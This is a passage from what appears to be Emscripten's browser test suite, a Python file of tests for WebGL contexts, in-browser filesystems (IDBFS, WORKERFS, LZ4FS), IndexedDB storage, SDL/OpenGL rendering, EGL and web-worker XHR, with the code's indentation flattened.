self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', 0, args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', path_from_root('tests', 'test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
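# The first run (-DFIRST) stores the secret from the preloaded moar.txt in
# persistent browser storage; later runs are expected to report that same
# secret back, even when a different moar.txt is preloaded over it.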
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
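# The first invocation (-DFIRST) writes the secret into an IDBFS-backed
# filesystem; the second invocation is expected to read it back after syncing
# from IndexedDB, optionally doing extra work first (-DEXTRA_WORK).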
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
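# Mounts a WORKERFS filesystem in preRun, backed by a Blob and a File object
# containing the two secrets, and reads them back from C inside the worker
# (--proxy-to-worker).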
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
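# Packages file1.txt and sub/file2.txt with the file packager using
# --separate-metadata, then reads the package from inside a worker via
# WORKERFS.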
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
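# Covers three ways of getting LZ4-compressed data into LZ4FS: compressing at
# link time via emcc -s LZ4=1 with --preload-file, compressing ahead of time
# with the file packager (--lz4), and loading/compressing manually at runtime
# (-DLOAD_MANUALLY).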
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress at link time: -s LZ4=1 makes emcc pass the LZ4 option on to the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. The client receives compressed data and can use it directly; this is the typical usage.
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([path_from_root('tests', 'fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime; this compresses on the client, which is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
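# Runs idbstore.c through a fixed sequence of stages, calling self.clear()
# between runs so that only state the page persisted in IndexedDB survives
# from one stage to the next.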
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
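# build the worker twice: once with file.dat preloaded and once without, and
# check the reported output in both cases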
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
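# Builds checksummer.c as a worker that lazily reads /bigfile over synchronous
# XHR in small chunks (-s SMALL_XHR_CHUNKS) from a separate helper HTTP server
# process, and reports the adler32 checksum of the data back to the test page.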
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # mask to an unsigned 32-bit value (Python 2's adler32 could return a negative int)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 59:
  raise Exception('the helper server did not become ready in time')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid a race condition on cleanup: wait a bit so that processes have released their file
# locks, otherwise the test tearDown may attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
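# full_es2 selects the source variant: 0 = hello_world_gles.c as-is,
# 1 = hello_world_gles_full.c with -s FULL_ES2, 2 = hello_world_gles_full_944.c
# with -s FULL_ES2.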
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
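# Builds a set of sample programs from the 'glbook' library and compares each
# against its reference image; samples that load .tga textures get those files
# preloaded.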
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
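# Builds the original (_orig.c) glbook samples against the GLES2/GLES3
# emulation layers and compares each against the same reference images as
# test_glbook.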
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
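# Packages two data files and checks that the program can read them with
# -s FORCE_FILESYSTEM; then repeats with the package generated into a
# subdirectory and copied next to the page.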
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
